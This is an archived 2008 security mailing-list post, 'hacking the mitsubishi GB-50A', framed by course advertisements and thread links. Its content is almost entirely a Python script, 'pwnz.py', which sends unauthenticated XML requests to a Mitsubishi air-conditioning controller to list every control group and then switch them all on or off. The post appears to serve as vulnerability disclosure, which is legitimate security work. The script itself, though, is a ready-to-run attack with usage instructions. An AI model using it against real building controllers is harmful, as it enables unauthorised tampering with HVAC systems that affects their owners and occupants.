Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | hacking the mitsubishi GB-50A |
|---|---|
| Date: | Sat, 22 Mar 2008 01:50:13 +0000 |
Hi All,
*sigh*
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
""" usage: python pwnz.py 192.168.1.x [on|off] """ # you can get BeautifulSoup from: # http://www.crummy.com/software/BeautifulSoup/#Download from BeautifulSoup import BeautifulSoup from httplib import HTTPConnection import sys ip = sys.argv[1] template = '<Mnet Group="%%s" Drive="%s" />' % sys.argv[2].upper() def post(data): c = HTTPConnection(ip) c.request('POST','/servlet/MIMEReceiveServlet',data,{'content-type':'text/xml'}) return BeautifulSoup(c.getresponse().read()) # first out what groups there are soup = post(""" <?xml version="1.0" encoding="UTF-8"?> <Packet> <Command>getRequest</Command> <DatabaseManager> <ControlGroup> <MnetList/> </ControlGroup> </DatabaseManager> </Packet> """) group_nums = [(g['group']) for g in soup.findAll('mnetrecord')] # now go through and set all the on/off bits to what we were told soup = post(""" <?xml version="1.0" encoding="UTF-8"?> <Packet> <Command>setRequest</Command> <DatabaseManager> %s </DatabaseManager> </Packet> """ % ('\n'.join([template%g for g in group_nums])))
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Fedora, Ubuntu publish wrong advisories for CVE-2007-6318, Abel Cheung |
|---|---|
| Next by Date: | phpAddressBook v2.11 Multiple Local File Inclusion Vulnerabilities, Guns |
| Previous by Thread: | Fedora, Ubuntu publish wrong advisories for CVE-2007-6318, Abel Cheung |
| Next by Thread: | RE: hacking the mitsubishi GB-50A, Desai, Ashish |
| Indexes: | [Date] [Thread] [Top] [All Lists] |